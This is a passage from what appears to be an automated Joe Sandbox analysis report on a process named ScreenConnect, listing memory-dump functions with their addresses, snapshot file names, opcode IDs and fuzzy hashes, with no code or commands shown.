                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e02acd4ba9ebc43b0584ddbbd172c025acd00bc29285a85d0ecf1aff9a133c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B2148768002499FDF10CF9AC844ADEBBF5FF48310F14852AE91467211C335A555CFA5
                                                                                                                                                                                                                                                          Function 015CEB70 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 70a159b0d78cb5976e62791f4540f2a567a62863dfb8d41c633d9870a36fd3f0
                                                                                                                                                                                                                                                          • Instruction ID: 5a5cc93ad779714266cff39b8bc5e48660652fb74984661d5858f8dbbade8da2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70a159b0d78cb5976e62791f4540f2a567a62863dfb8d41c633d9870a36fd3f0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11E9322082844FD706CF68D852DA57F66EF8621471980EEE885CF362C635A842CB61
                                                                                                                                                                                                                                                          Function 03CF0738 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 30273fa02b74d875c468b3b51efee45286abf1c2300f0628e111792f695816ce
                                                                                                                                                                                                                                                          • Instruction ID: abde261cd76977a7b4f0f26b134faa018f2d11327eebfa420df0db2c4710ad55
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30273fa02b74d875c468b3b51efee45286abf1c2300f0628e111792f695816ce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F921C631A012188FC754DFA1D4557AEBBB6AF88B15F18846DD102F7261CB705D41CFA0
                                                                                                                                                                                                                                                          Function 015C86D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 869888e3ccf2daf61500242c7a8000ab0d82f08052c060c06634f304d9f27460
                                                                                                                                                                                                                                                          • Instruction ID: 15e86cbccfcfaa44761bee5f982ef3782547cead5e338f51c5a44abb6ea48c73
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 869888e3ccf2daf61500242c7a8000ab0d82f08052c060c06634f304d9f27460
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A212C702007058FD734CF65D84459ABBF1FF84724B108A2DD5939B6A1EB32E95ACF90
                                                                                                                                                                                                                                                          Function 015C8B30 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1e3b733350c8d843a0ab0c0c8cb29e971f15a4ccb390ae195a651a3379c173bf
                                                                                                                                                                                                                                                          • Instruction ID: 79fbb836f15cb4a32ee73c484ed3de9201b01d11df76ba9797bfb28792887a0a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e3b733350c8d843a0ab0c0c8cb29e971f15a4ccb390ae195a651a3379c173bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37216D32E01259CFDF01EFA8E880ADDBBB2FF86314F08856AD405BB155D731690ACB90
                                                                                                                                                                                                                                                          Function 03CF1C10 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 036c8c7f85b4013853c80df6429bb0154a7954a6b7ce816d33d72bf9d2a8182e
                                                                                                                                                                                                                                                          • Instruction ID: 954fb516c645f85b5b392613b7b424bf38ddcf6034266c41fb1c65f74dba2d06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036c8c7f85b4013853c80df6429bb0154a7954a6b7ce816d33d72bf9d2a8182e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6521CFB4A006099FCB01EFA8D9459AEBBB1FF89300B048899D602E7345CB30A905DF92
                                                                                                                                                                                                                                                          Function 03CF0748 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: aa114dc7c73261591e46a800fa7cdbd9b158b7a4cfb57659468168c02e8ee79e
                                                                                                                                                                                                                                                          • Instruction ID: 728c5c9f94da7f98f41f26c4d8968d3d32ea8a086cb07ca4bcb975830db42dbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa114dc7c73261591e46a800fa7cdbd9b158b7a4cfb57659468168c02e8ee79e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28219335E002188FDB58DBA1C4547AEBBB2AF88B14F1484ADD502FB2A1DF715D41CFA0
                                                                                                                                                                                                                                                          Function 015CA7B8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 440a2b8869c89ee256dda39c352a60d33cb5aea87c427d8f8d00af0e1e17b3c8
                                                                                                                                                                                                                                                          • Instruction ID: 7190b6fd05c6a23ddebac18914d22e77faef8701d901ab91774699b71c4994a2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 440a2b8869c89ee256dda39c352a60d33cb5aea87c427d8f8d00af0e1e17b3c8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5213D70A00705CFD724DF69D858A6BBBF1FF48710B108A2CD4A68B6A5E731E902CF80
                                                                                                                                                                                                                                                          Function 015CED74 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e66df80663964e42a8d7dda6fabbd3aa37e800137beff99c6f95fb747a9f09a7
                                                                                                                                                                                                                                                          • Instruction ID: c50f8b4426734c6a04f6b3b967d9a55be0a112ae9465b5f0f742ff3f1aaa46e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e66df80663964e42a8d7dda6fabbd3aa37e800137beff99c6f95fb747a9f09a7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E210832D1070A9DCB00EFB9D8515EEFBB0EF99350F10C72AE559A6111FB70A2958B90
                                                                                                                                                                                                                                                          Function 015C8C30 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 991a68c5bd31088500f03e62ba36db1b2118ee47856e347bd0e5fa3b317f95d7
                                                                                                                                                                                                                                                          • Instruction ID: 97f1356c714d863cea9db0d9ca89155f665ae7ee43cc5e01810d6314d3a63025
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991a68c5bd31088500f03e62ba36db1b2118ee47856e347bd0e5fa3b317f95d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0611D3717002095BD710EB64D941BAEB3A2FFC6650F00C528E405DB385DF70AD15A7D2
                                                                                                                                                                                                                                                          Function 015CF880 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c8f6e9cac43a31abcb34e69cbc380c1912868c9272ff31c7bcadacae3666abd4
                                                                                                                                                                                                                                                          • Instruction ID: 00dbd236c15c4123e643b8b671d883c6186e5d4aa98fb06f55f798168c4c384b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8f6e9cac43a31abcb34e69cbc380c1912868c9272ff31c7bcadacae3666abd4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 622137768002499FDF10CF9AC844ADEBBF5FB48310F14842AE914A7250C379A555CFA5
                                                                                                                                                                                                                                                          Function 015CE1A0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d362316815482362fbf01d1471e50105c0dc5c586c44b7e79b8c0be4c1798da8
                                                                                                                                                                                                                                                          • Instruction ID: 08fe098c1c21a9185a0249e9ccce903ca1162ca6aaa7ec81d37668fe3bf53964
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d362316815482362fbf01d1471e50105c0dc5c586c44b7e79b8c0be4c1798da8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77117F716002099FCB10DFA4DC81AAEB7F5FF88620B008529E515EF315DB30ED018F95
                                                                                                                                                                                                                                                          Function 015CFA72 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d8e0f7f3cb7b74d84dca85a7d50c131be443f7683544bbf25ee2b6e82d4bcfb2
                                                                                                                                                                                                                                                          • Instruction ID: b622ba6e786a9f0ad040f45c2950b69fea9de842a76ced0bc9b0ff885993c1c5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e0f7f3cb7b74d84dca85a7d50c131be443f7683544bbf25ee2b6e82d4bcfb2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA01A9363410008FC308DB7EF8908ADBBA6FBC8261318846BE409CB322CA32AC17C754
                                                                                                                                                                                                                                                          Function 03CF28D0 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bdfc6f44a7396809b7ed83ff68900df28f65d5228ef4a8a42ef0a3584c1c17ad
                                                                                                                                                                                                                                                          • Instruction ID: 745dc0b72d226ba21df01a236a70ee1c6a1d81b372dec23dc026dfbb1a53217b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdfc6f44a7396809b7ed83ff68900df28f65d5228ef4a8a42ef0a3584c1c17ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 131125217003185FCB11EA7D8440B5EB7E9AFCA590B0580ADD009CF355DB30DD0583A2
                                                                                                                                                                                                                                                          Function 00FCD597 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                                                                                                                                                                                          • Instruction ID: 196490baa6955e6cacb0d096334ca2e87989fdfc4d90c3948e807e84373556bd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A711D376904284CFCB16CF10DAC4B1ABF72FB94324F24C6ADD8494B656C336D85ADBA1
                                                                                                                                                                                                                                                          Function 015C484C Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9d6482b4fbd81b32b48aa39dd6322cc1e77ebc5a21b885aa54b3055a38aa917e
                                                                                                                                                                                                                                                          • Instruction ID: 46df28821fddd43cd8daf6e0f269657893f1b4378a4e4e73fd5822f86e4adf60
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d6482b4fbd81b32b48aa39dd6322cc1e77ebc5a21b885aa54b3055a38aa917e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F62106B28102499FDB10CF9AC444BEEFBF4FB48720F14842AD919A7240D3B8A545CFA5
                                                                                                                                                                                                                                                          Function 015C8AA0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c86870b34aa75f399103d434a70a277ec95ba1d747485338485fdf83367f5a4
                                                                                                                                                                                                                                                          • Instruction ID: b225ed299dbb0af1a94b7c03efa8f340255f5420bb9c79624003b36a69c5bef7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c86870b34aa75f399103d434a70a277ec95ba1d747485338485fdf83367f5a4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6511517590021A9FCF01DFA4C880ADEBBF1FF4A314F108155E504FB251E771AA06CB91
                                                                                                                                                                                                                                                          Function 015C5350 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4c4c4fe2b4f9e9dd25226b0dc55eb294dfb39c520102ea6ec8d4bf3f804dc6a7
                                                                                                                                                                                                                                                          • Instruction ID: 55a6de383bca48d6db8276737d0ee17234ed0738d6ac67c5a06d628dc6bd0255
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c4c4fe2b4f9e9dd25226b0dc55eb294dfb39c520102ea6ec8d4bf3f804dc6a7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D2136B2C002598FDB20CF9AC444BDEFBF4FB48320F10846AD558A7240D378A545CFA5
                                                                                                                                                                                                                                                          Function 03CF1C20 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 547642b97d28b5fccbe71f8d15f26063dda4e83291f2c48bf5879db4e9bc21e0
                                                                                                                                                                                                                                                          • Instruction ID: 9278f87e878d18ab4ba5e1390e34dbfeed1472b856684c0a418357a973558c14
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 547642b97d28b5fccbe71f8d15f26063dda4e83291f2c48bf5879db4e9bc21e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32217FB5E0060D9FCB00EFA9D9449AEBBB1FF88310B108958D602E7344CB30A905DF95
                                                                                                                                                                                                                                                          Function 015C73F8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4f47d05d56e39fc3353a571f2d1e7ae5b0b15ff1af02aeca764e33a2202c8b56
                                                                                                                                                                                                                                                          • Instruction ID: 6e68529cf9c6f824186aeccfda6930ad543b37e7e79ddc4d607fbd8818570306
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f47d05d56e39fc3353a571f2d1e7ae5b0b15ff1af02aeca764e33a2202c8b56
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22118C317006058FCB05DFA8D494A6EFBB2FF89210B1581A9D909DF395DB30AC01CB90
                                                                                                                                                                                                                                                          Function 03CF4F8B Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a1135cb8f143fd57b0319e8128bc64270d954801051a79f219c259e679f53ce9
                                                                                                                                                                                                                                                          • Instruction ID: 1145aaaf2223264a0abba85509efd4efa8826d8a8de21a37be94ff29065d21a6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1135cb8f143fd57b0319e8128bc64270d954801051a79f219c259e679f53ce9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001C43160D3C45FD303E739581155A7FB19E8311034DC5EBE049CF293EA298C06C7A2
                                                                                                                                                                                                                                                          Function 015C5440 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6f99014cc151f52555074afbcb693dd02ca874785cd7bc38d831d5a7d3ab8b61
                                                                                                                                                                                                                                                          • Instruction ID: f276bd92f30a2e697563aef5bce7436a4f9f6b76f35b30ac7b059a20477fb202
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f99014cc151f52555074afbcb693dd02ca874785cd7bc38d831d5a7d3ab8b61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E0144363193848FD712CFA8DCD1B547FB06F1391674944EAD544CF263E229A806DB26
                                                                                                                                                                                                                                                          Function 03CF50A8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e0d35df12d21bcc4e667e7f2608a9bae046677113daae4ae3c5a56d119420e9b
                                                                                                                                                                                                                                                          • Instruction ID: 10dee600983f4da741cd28e2c826ca9270dc710fe125668398b217f39ad6bde1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d35df12d21bcc4e667e7f2608a9bae046677113daae4ae3c5a56d119420e9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB0140357046128F8750EB59D484A1AB7EABFCD62531580ACEA49CB715DF21ED02DBC0
                                                                                                                                                                                                                                                          Function 015CCBC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 42b384c847f4d3e34a2aae70cce8f43f8a35289b7101c6f1a3dbd63cb7abbe84
                                                                                                                                                                                                                                                          • Instruction ID: fcb2fb6bab290b9e430e2328a74c37a9dfde83b07e362eba8a185ba608b13ee2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42b384c847f4d3e34a2aae70cce8f43f8a35289b7101c6f1a3dbd63cb7abbe84
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B119A71A0021D9FDF19DFA8D8547EDB7B1BF89710F004469D415BB260DB781944CBA5
                                                                                                                                                                                                                                                          Function 015C8B95 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
